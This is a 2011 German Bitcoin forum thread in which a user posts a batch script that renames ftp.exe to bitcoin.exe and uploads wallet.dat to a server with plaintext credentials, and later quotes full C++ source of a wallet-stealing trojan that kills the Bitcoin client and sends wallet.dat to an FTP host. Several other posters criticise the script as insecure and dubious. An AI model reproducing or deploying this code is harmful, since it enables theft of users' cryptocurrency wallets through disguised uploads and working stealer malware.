|
Title: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: Retard on June 28, 2011, 12:06:19 PM Hier unten seht ihr ein kleines script was ihr in eine textdatei hineinkopiert und anpassen könnt.
Quote @copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe @cd %APPDATA% @%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF open server.ohne.http benutzername passwort bin put "Bitcoin\wallet.dat" bye Die datei dann abspeichern bsp. save.bat nennen. nach belieben könnt ihr die alte wallet im anschluss löschen lassen dazu einfach Quote Del /S /Q %APPDATA%\bitcoin\wallet.dat benutzen.Ich hoffe ich war dem einen oder anderem hilfreich Title: Re: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: crashdown on June 28, 2011, 02:30:41 PM Oha, also... :o
vorweg eine Frage zu dem Script. Ich werde es zwar nicht brauchen aber aus grundsätzlichem Interesse. Wieso bitte kopierst du die ftp.exe in die Datei bitcoin.exe ??? Und dann noch als Hinweis: Ich würde drei Dinge nicht tun: 1. Per ftp(!) unverschlüsselt eine wallet.dat ins Netz schieben 2. Für einen Server auf dem die wallet.dat liegt den Nutzer und das Passwort im Klartext in einem Script speichern. 3. Ein Script meine wallet.dat löschen lassen ohne sicher zu gehen, dass diese auch korrekt auf dem Server liegt. 1 und 2 macht das Script aber, 3 macht es mit der optionalen Zeile. Ich würde das so nicht nutzen. Title: Re: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: Retard on June 28, 2011, 03:48:02 PM Oh ha,
selbstverständlich hast du recht ! Quote 1. Per ftp(!) unverschlüsselt eine wallet.dat ins Netz schieben 2. Für einen Server auf dem die wallet.dat liegt den Nutzer und das Passwort im Klartext in einem Script speichern. 3. Ein Script meine wallet.dat löschen lassen ohne sicher zu gehen, dass diese auch korrekt auf dem Server liegt. Das problem das die FTP daten in der Bat stehen darin sehe ich kein problem. Da die bat standort unabhängig ist. Du kannst sie nutzen vom stick aus , und nennen wie du willst. Hmm Entschuldigung wenn ich mich so schlecht ausdrücke :( Ich bin davon ausgegangen das wenn jemand einen Server benutzt auch eine sichere verbindung besteht via httacces z.B Nutzungs beisspiel 1 Nehmen wir an du hast VmWare und dort hostet du via XAMPP in der Virtuellen maschine deinen Host zum saven , dann brauchst du nur noch einen mausklick machen um deine datei dort abzuspeichern. Nutzungs beisspiel 2 Anstatt die wallet.dat zu nehmen kann man auch jede andere datei damit Uploaden auch eine wallet.rar mit verschlüsselung die wirklich jeder haben sollte (mindestens). Der 2 zweite eintrag zum löschen ist eine eigene Bat , da du sonst unter umständen die wallet auf dem server löschen würdest . -------------- Da zur zeit aber nur ein Trojaner umher geht der die wallet.dat stiehlt wird dies ausreichen um die sicherheit zu gewährleisten bei beisspiel 1-2... hier der aktuelle trojaner Quote #include <windows.h> #include <tlhelp32.h> #include <tchar.h> #include <wininet.h> #include <ctime> #include <iostream> #pragma comment(lib, "wininet") void killprocess() { HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 ); PROCESSENTRY32 ProcessEntry = { 0 }; ProcessEntry.dwSize = sizeof( ProcessEntry ); BOOL Return = FALSE; Return = Process32First( hProcessSnapShot,&ProcessEntry ); int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe")); if (value==0) { HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID); TerminateProcess(hProcess,0); CloseHandle(hProcess); //Close Handle } } while( Process32Next( hProcessSnapShot, &ProcessEntry )); CloseHandle( hProcessSnapShot ); } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { killprocess(); Sleep(40000); srand((unsigned)time(NULL)); int seedone=rand(); int seedtwo=rand()*3; int seedboth = seedone + seedtwo; char randomseed[99]; itoa(seedboth,randomseed,10); char* appdata = getenv("%APPDATA%"); char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); HINTERNET hInternet; HINTERNET hFtpSession; hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0); hFtpSession = InternetConnect(hInternet, "ftp.", INTERNET_DEFAULT_FTP_PORT, "", "", INTERNET_SERVICE_FTP, 0, 0); FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0); FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0); InternetCloseHandle(hFtpSession); InternetCloseHandle(hInternet); return 0; } Das intressante daran ist das der trojaner nur die wallet.dat kopieren kann wenn die bitcoin.exe geschlossen ist Title: Re: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: crashdown on June 28, 2011, 04:19:41 PM Das problem das die FTP daten in der Bat stehen darin sehe ich kein problem. Da die bat standort unabhängig ist. Du kannst sie nutzen vom stick aus , und nennen wie du willst. Hmm Entschuldigung wenn ich mich so schlecht ausdrücke :( Ich bin davon ausgegangen das wenn jemand einen Server benutzt auch eine sichere verbindung besteht via httacces z.B Nutzungs beisspiel 1 Nehmen wir an du hast VmWare und dort hostet du via XAMPP in der Virtuellen maschine deinen Host zum saven , dann brauchst du nur noch einen mausklick machen um deine datei dort abzuspeichern. Nutzungs beisspiel 2 Anstatt die wallet.dat zu nehmen kann man auch jede andere datei damit Uploaden auch eine wallet.rar mit verschlüsselung die wirklich jeder haben sollte (mindestens). Der 2 zweite eintrag zum löschen ist eine eigene Bat , da du sonst unter umständen die wallet auf dem server löschen würdest . -------------- Da zur zeit aber nur ein Trojaner umher geht der die wallet.dat stiehlt wird dies ausreichen um die sicherheit zu gewährleisten bei beisspiel 1-2... Entschuldigung aber: - im Klartext gespeicherte Passwörter sind immer ein Problem. Egal(!) wie der Dateiname ist. - htaccess gesicherte Verbindung? htaccess sichert keine Verbindung. Das hat mit der Verschlüsselung des Datenverkehrs nichts zu tun. - Die Anwendungsbeispiele sind, nunja, etwas dubios. - Was soll der Quelltext quote? ??? edit: Und warum wird jetzt die ftp.exe zu bitcoin.exe kopiert? Title: Re: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: BitCoinBaron on June 28, 2011, 04:43:42 PM Und wie man sehen kann, sucht der trojaner nur in dem Stantardverzeichniss
Quote char* appdata = getenv("%APPDATA%"); char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); Da wird er bei mir nix finden ;D Title: Re: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: Retard on June 28, 2011, 05:09:58 PM Hmm ja ich sehe ein das klartext passwörter ein problem darstellen. weis jetzt aber so keine lösung.
Lach ja httacces ist für den webserver vorgesehn ^^ und für die übertragung ssl ... bekomm wohl meinen ersten hitze stich . naja die beispiele sind eben nur beisspiele.. der quelltext ist der aktuelle trojaner der jagt auf wallets macht, wollte die community informieren gewarnt sind sie hoffentlich . Darin kann man auch erkennen das nur windows 7 systeme betroffen sind zurzeit mit dieser variante . joo der schnipsel hat echt keine funktion O.o Quote %PUBLIC%\bitcoin.exe Ich persönlich verwende die bat , zwar schick ich nicht die wallet.dat hoch sondern die wallet.rar @crashdown danke für die verbesserung :P Title: Re: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: mipl on June 28, 2011, 05:12:51 PM Quote @copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe Und zum Trojaner-Code: Warum hast Du da die originalen Kommentare gelöscht? Und warum sollte ich in einer VM XAMPP laufen lassen, um dann auch noch darauf Daten zu sichern? Don't drink and write! Title: Re: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: crashdown on June 28, 2011, 05:22:20 PM Hmm ja ich sehe ein das klartext passwörter ein problem darstellen. weis jetzt aber so keine lösung. Quote joo der schnipsel hat echt keine funktion O.o Quote %PUBLIC%\bitcoin.exe Ich persönlich verwende die bat , zwar schick ich nicht die wallet.dat hoch sondern die wallet.rar @crashdown danke für die verbesserung :P Der von dir zitierte Codeteil steht so an 2 Stellen und erfüllt natürlich beides mal eine Funktion - nur die Funktion die er jeweils erfüllt ist totaler Quatsch. Bist du dir sicher dass du weißt was du da tust? ::) Title: Re: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: Retard on June 28, 2011, 05:28:05 PM mittlerweile habe ich zweifel ob das alles so gut ist O.o ich brauch nen bier....
@mipl soll ich etwa direkt nen download link mit posten ? *rofl* Title: Re: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: klaaster on June 28, 2011, 09:38:01 PM @copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe @cd %APPDATA% @%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF open server.ohne.http benutzername passwort bin put "Bitcoin\wallet.dat" bye Wieso bitte kopierst du die ftp.exe in die Datei bitcoin.exe ??? edit: Und warum wird jetzt die ftp.exe zu bitcoin.exe kopiert? Warum um alles in der Welt sollte ich ein Programm aus %Systemroot% in das öffentliche Verzeichnis %PUBLIC% kopieren und von da aus starten?!? Und dann auch noch umbenannt in bitcoin.exe? joo der schnipsel hat echt keine funktion O.o Quote %PUBLIC%\bitcoin.exe Bastelstunde ;D Versuch doch mal das Problem der Pfadangabe im put-Befehl anders zu lösen. Title: Re: Script zum Uploaden eurer wallets auf eigenem server "Windows" Post by: mipl on June 29, 2011, 05:30:31 AM Ich würde dafür eh wput (pendant zu wget) benutzen. Oder noch einfacher: SyncBack Freeware. Das spart mir merkwürdige, sicherheitstechnisch bedenkliche und wirre Konstruktionen. ;)
|